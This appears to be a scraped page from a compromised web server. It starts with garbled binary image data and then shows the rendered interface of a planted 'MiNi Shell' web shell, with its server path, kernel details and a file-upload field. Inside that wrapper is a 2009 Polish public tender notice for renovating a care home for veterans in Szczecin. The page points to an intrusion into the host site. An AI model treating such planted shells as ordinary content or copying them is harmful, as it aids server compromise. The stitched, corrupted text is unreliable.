JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090911/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090911/316136-N-2009.html

<p class="kh_header"><b>Szczecin: Modernizacja - remont pomieszczeń mieszkalnych, ciągów komunikacyjnych, kuchni i tarasu w budynku Domu Pomocy Społecznej Dom Kombatanta i Pioniera Ziemi Szczecińskiej przy ulicy Eugeniusza Romera 21-29 w Szczecinie 71-246 w części I - modernizacja instalacji elektrycznej kuchni
w części II -modernizacja - remont tarasu i pomieszczeń parter segment C od strony tarasu
w części III - modernizacja I piętra segmentu C, w części IV- modernizacja II piętra segment C
w części V - modernizacja III piętra segment C,w części VI - modernizacja IV piętra segment C</b><br>
<b>Numer ogłoszenia: 316136 - 2009; data zamieszczenia: 11.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej Dom Kombatanta i Pioniera Ziemi Szczecińskiej , ul. Romera, 71-246 Szczecin, woj. zachodniopomorskie, tel. 091 4327712, faks 091 4327712.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dps.romera.szczecin.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.dps.romera.szczecin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja - remont pomieszczeń mieszkalnych, ciągów komunikacyjnych, kuchni i tarasu w budynku Domu Pomocy Społecznej Dom Kombatanta i Pioniera Ziemi Szczecińskiej przy ulicy Eugeniusza Romera 21-29 w Szczecinie 71-246 w części I - modernizacja instalacji elektrycznej kuchni
w części II -modernizacja - remont tarasu i pomieszczeń parter segment C od strony tarasu
w części III - modernizacja I piętra segmentu C, w części IV- modernizacja II piętra segment C
w części V - modernizacja III piętra segment C,w części VI - modernizacja IV piętra segment C.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
Modernizacja - remont pomieszczeń mieszkalnych, ciągów komunikacyjnych, kuchni i tarasu w budynku Domu Pomocy Społecznej Dom Kombatanta i Pioniera Ziemi Szczecińskiej przy ulicy Eugeniusza Romera 21-29 
w Szczecinie 71-246 
w części I - modernizacja instalacji elektrycznej kuchni
w części II -modernizacja - remont tarasu i pomieszczeń parter segment C od strony tarasu
w części III - modernizacja I piętra segmentu C, 
w części IV- modernizacja II piętra segment C,
w części V - modernizacja III piętra segment C,
w części VI - modernizacja IV piętra segment C
Realizacja przedmiotu zamówienia:  w części I - 75 dni kalendarzowych od dnia podpisania umowy, w części II -  75 dni kalendarzowych od dnia podpisania umowy, w części III - 75 dni kalendarzowych od dnia podpisania umowy, w części IV - 75 dni kalendarzowych od dnia podpisania umowy, w części V-75 dni kalendarzowych od dnia podpisania umowy, w części VI - 75 dni kalendarzowych od dnia podpisania umowy. 
Podstawa techniczno - prawna realizacji zamówienia:
              1)   specyfikacja techniczna wykonania i odbioru robót,
              2)  Ustawa z dnia 07.07.1994r. - Prawo budowlane (tekst jedn. Dz. U. z 2003 r. Nr 207,poz. 2016 ze zm.),
              3)   Obowiązujące przepisy, normy, warunki techniczne.
  5.    Warunki realizacji zamówienia.
         1) warunki wykonania robót:
             a)   Wykonawstwo robót zgodnie ze specyfikacją techniczną wykonania i odbioru robót,przepisami prawa budowlanego, warunkami technicznymi, normami,
             b)  Stosowane materiały muszą odpowiadać wymogom wyrobów dopuszczonych do obrotu i stosowania w budownictwie, określonym w ustawie Prawo budowlane,
c) Podczas realizacji przedmiotu zamówienia - w przypadku powstania odpadów - wykonawca zobowiązany jest udokumentować zagospodarowanie odpadów w sposób zgodny z ustawą z dnia 27.04.2001r. o odpadach (Dz. U. Nr 62 poz. 628 ze zm.) i ustawą z dnia 13.09.1996r. o utrzymaniu czystości i porządku w gminach (Dz. U. Nr 132 poz. 622 ze zm) oraz uchwałą nr VI10603 Rady Miasta Szczecina z dnia 27.05.2003r. w sprawie szczegółowych zasad utrzymania czystości i porządku na terenie Miasta Szczecina (Dz. Urz. Woj. Zachodniopomorskiego nr 60 poz. 1098).
  6. Podstawa prawno - techniczna wykonania przedmiotu zamówienia:
    a) Projekt budowlano - wykonawczy pn.: Modernizacja Domu Pomocy Społecznej Domu  Kombatanta i Pioniera Ziemi Szczecińskiej wykonany przez Biuro Projektowo-Badawcze Budownictwa Ogólnego MIASTOPROJEKT - BYDGOSZCZ z siedzibą przy 
       ul. Jagiellońskiej 12a  w Bydgoszczy (załącznik nr 5 do siwz);
    b) Specyfikacja Techniczna Wykonania i Odbioru Robót Budowlanych (załącznik nr 6 do siwz);
    c) Przedmiar robót (załącznik nr 7 do siwz);

7. Warunki wykonawstwa:
    1) Wszystkie roboty należy wykonać zgodnie z Dokumentacją Projektową, Specyfikacją Techniczną Wykonania i Odbioru Robót Budowlanych, postanowieniami umowy i zasadami sztuki budowlanej, przyjętą przez zamawiającego technologią i wymogami poczynionych uzgodnień;
    a) jeżeli ze względów technologicznych lub organizacyjnych niezbędne jest wydłużenie czasu pracy ponad czas pracy urzędu w dni robocze, lub wykonanie robót w dni  ustawowo wolne od pracy, powinno to być uzgodnione z zamawiającym;
    b)  roboty prowadzone będą w czynnym obiekcie (dom pomocy społecznej). Fakt ten należy   uwzględnić przy organizacji robót (np.: prace montażowe, transportowe, mogące zakłócić  standardowe warunki pobytu mieszkańców przez powodowanie długotrwałego hałasu-  należy prowadzić w uzgodnieniu z zamawiającym);
    c)  zamawiający zastrzega sobie możliwość narzucenia kolejności prowadzenia prac w zależności od bieżących możliwości udostępniania pomieszczeń przez Zamawiającego, 
    d)  wykonawca zobowiązany będzie do:
         - zapewnienia dla swoich pracowników zaplecza biurowego, magazynowego i socjalnego  wraz z kontenerem sanitarnym, które zostanie ustawione w miejscu wskazanym przez  zamawiającego  (zamawiający nie udostępni pomieszczeń w budynku domu),
    e)   zapewnienia ochrony mienia znajdującego się na terenie budowy, w szczególności  pod względem przeciwpożarowym,
    f)   utrzymania porządku na terenie budowy oraz w pomieszczeniach w czasie realizacji umowy,
    g)   uzyskania zgody Zarządu Dróg i Transportu Miejskiego na zajęcie ulicy lub chodnika na własny koszt (jeżeli będzie to konieczne),
    h)   oznaczenia zgodnie z obowiązującymi przepisami terenu budowy oraz wygrodzenie  miejsc prowadzenia robót w sposób umożliwiający działanie czynnego obiektu   zapewnienie bezpieczeństwa użytkownikom domu,
     i)  wykonawca ma obowiązek udokumentowania zamawiającemu sposobu zagospodarowania odpadów budowlanych - jako warunek dokonania odbioru końcowego przedmiotu zamówienia;
     j)   likwidacji terenu budowy i zaplecza socjalnego i przywrócenie terenu do jego stanu  pierwotnego po zakończeniu robót objętych umową;
8.    Wszystkie materiały użyte do realizacji przedmiotu zamówienia muszą posiadać
        stosowne: atesty, certyfikaty, aprobaty techniczne, deklaracje zgodności wyrobu z  obowiązującą normą lub aprobatą techniczną bądź inne dokumenty potwierdzające ich  dopuszczenie do obrotu i powszechnego stosowania w budownictwie;
    1)    Wykonawca sporządzi dokumentację powykonawczą w dwóch egzemplarzach na własny  koszt;
    2)     Przedmiot zamówienia będzie dostarczony przez wykonawcę na koszt i ryzyko własne.
    3)     Po wykonaniu zamówienia sporządzony zostanie protokół odbioru, który po podpisie i  akceptacji przez Zamawiającego będzie podstawą do wystawienia faktury. 
    4)     Płatność przelewem na konto wykonawcy nie później niż po upływie 30 dni od chwili  otrzymania faktury.

UWAGA: Ze względu na fakt, że prace budowlane wykonywane będą w czynnym obiekcie, Wykonawca musi na bieżąco utrzymywać pomieszczenia i korytarze w należytej czystości (tj. po wykonaniu prac należy dokładnie umyć pomieszczenia i korytarze w których prowadzone były prace )..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.11.11.00-9, 45.26.25.22-6, 45.10.00.00-4, 45.23.10.00-7, 45.30.00.00-0, 45.31.00.00-3, 45.11.12.20-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 75.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1)   posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, 
2)   posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
3)   znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4)   nie podlegają wykluczeniu z postępowania o udzielenie zamówienia,
5)   spełniają następujący warunek dodatkowy:
a.   wykonali należycie w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie minimum 3 prace podobne do objętych przedmiotem zamówienia. Za pracę podobną zamawiający uzna: roboty wykończeniowe i ogólnobudowlane wykonane w budynkach nowo budowanych bądź remontowanych, o wartości co najmniej 100.000,00 zł netto każda.  
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na podstawie dokumentów złożonych przez Wykonawcę, na zasadzie SPEŁNIA/ NIE SPEŁNIA..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Każdy z wykonawców ma obowiązek złożyć następujące oświadczenia i dokumenty potwierdzające spełnienie warunków udziału w postępowaniu:
1)   Oświadczenie wykonawcy, według wzoru, stanowiącego załącznik nr 2 do niniejszej siwz: o spełnianiu warunków określonych w art. 22 ust. 1 pkt 1ustawy,
W przypadku składania oferty wspólnej ww. oświadczenie składa pełnomocnik 
w imieniu wykonawców składających ofertę wspólną.
           
2)   Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej (jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności), wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
W przypadku składania oferty wspólnej ww. dokument składa każdy z wykonawców składających ofertę wspólną.
3)  Wykaz wykonanych robót budowlanych (prac podobnych)w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat i odbiorców według wzoru, stanowiącego załącznik nr 3 do niniejszej siwz oraz dokumenty - np. referencje potwierdzające, że roboty te zostały wykonane należycie, 
W przypadku składania oferty wspólnej wykonawcy składający ofertę wspólną składają jeden wspólny ww. wykaz. 
     3.    Ponadto wykonawcy mają dołączyć do oferty następujące dokumenty:
1)  ofertę cenową zgodnie z Rozdziałem I pkt 3 siwz;
W przypadku składania oferty wspólnej należy złożyć jeden dokument
2)  odpowiednie pełnomocnictwa;
Tylko w sytuacjach określonych w Rozdziale I pkt 5 zdanie 2  lub w przypadku składania oferty wspólnej (Rozdział III pkt 1siwz).
3)   oświadczenie według wzoru stanowiącego załącznik nr 1 do siwz wskazujące cześć zamówienia, której wykonanie wykonawca powierzy podwykonawcom (jeżeli wykonawca przewiduje udział podwykonawców);
W przypadku składania oferty wspólnej należy złożyć jeden dokument
4.   Zamawiający wezwie wykonawców, którzy w określonym terminie nie złożą oświadczeń  lub dokumentów, o których mowa w art. 25 ust. 1 ustawy, lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez zamawiającego oświadczenia i dokumenty, o których mowa w art. 25 ust. 1, zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez wykonawcę warunków udziału w postępowaniu oraz spełnienie przez oferowane dostawy wymagań określonych przez zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert. 
5. W przypadku załączenia do oferty innych dokumentów niż wymagane przez zamawiającego (np. materiałów reklamowych i informacyjnych) zaleca się aby stanowiły one odrębną część, nie złączoną z ofertą w sposób trwały. Dokumenty takie nie będą podlegały ocenie przez zamawiającego..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.dps.romera.szczecin.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej Dom Kombatanta i Pioniera Ziemi Szczecińskiej ul. Romera 21-29 Szczecin 71-246 pok. nr 126 sekretariat.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.10.2009 godzina 09:30, miejsce: Dom Pomocy Społecznej Dom Kombatanta i Pioniera Ziemi Szczecińskiej ul. Romera 21-29 Szczecin 71-246 pok. nr 126 sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> modernizacja instalacji elektrycznej kuchni.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> modernizacja instalacji elektrycznej kuchni mająca na celu podłączenie pieca konwekcyjno-parowego.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.30.00.00-0, 45.10.00.00-3, 45.31.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 75.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> modernizacja polegająca na remoncie tarasu i pomieszczeń parter segment C od strony tarasu.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> modernizacja polegająca na remoncie tarasu i pomieszczeń parter segment C od strony tarasu.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.11.00-9, 45.26.25.22-6, 45.33.12.10-1, 45.10.00.00-4, 45.30.00.00-0, 45.26.00.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 75.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> modernizacja I piętra segmentu C.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> modernizacja pomieszczeń mieszkalnych oraz ciągów komunikacyjnych I piętra segmentu(budynku) C zgodnie z przedmiarami robót, prace elektryczne tylko w zakresie wyszczególnionym w specyfikacji.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.11.00-9, 45.26.25.22-6, 45.33.12.10-1, 45.22.31.00-7, 45.42.11.41-4, 45.42.11.46-9, 45.41.00.00-4, 45.43.00.00-0, 45.42.10.00-4, 45.45.00.00-6, 45.34.32.20-1, 45.31.00.00-3, 45.31.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 75.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> modernizacja II piętra segmentu C.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> modernizacja pomieszczeń mieszkalnych oraz ciągów komunikacyjnych II piętra segmentu (budynku) C zgodnie z przedmiarami robót, prace elektryczne tylko w zakresie wyszczególnionym w specyfikacji.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.11.11.00-9, 45.26.25.22-6, 45.41.00.00-4, 45.22.31.00-7, 45.30.00.00-0, 45.31.00.00-3, 45.31.10.00-0, 45.11.12.20-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 75.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> modernizacja III piętra segmentu C.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> modernizacja pomieszczeń mieszkalnych oraz ciągów komunikacyjnych II piętra segmentu (budynku) C zgodnie z przedmiarami robót, prace elektryczne tylko w zakresie wyszczególnionym w specyfikacji.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.11.11.00-9, 45.26.25.22-6, 45.41.00.00-4, 45.22.31.00-7, 45.30.00.00-0, 45.31.00.00-3, 45.31.10.00-0, 45.11.12.20-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 75.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> modernizacja  IV piętra segmentu C.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> modernizacja pomieszczeń mieszkalnych oraz ciągów komunikacyjnych II piętra segmentu (budynku) C zgodnie z przedmiarami robót, prace elektryczne tylko w zakresie wyszczególnionym w specyfikacji.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.11.11.00-9, 45.26.25.22-6, 45.41.00.00-4, 45.22.31.00-7, 45.30.00.00-0, 45.31.00.00-3, 45.31.10.00-0, 45.11.12.20-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 75.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com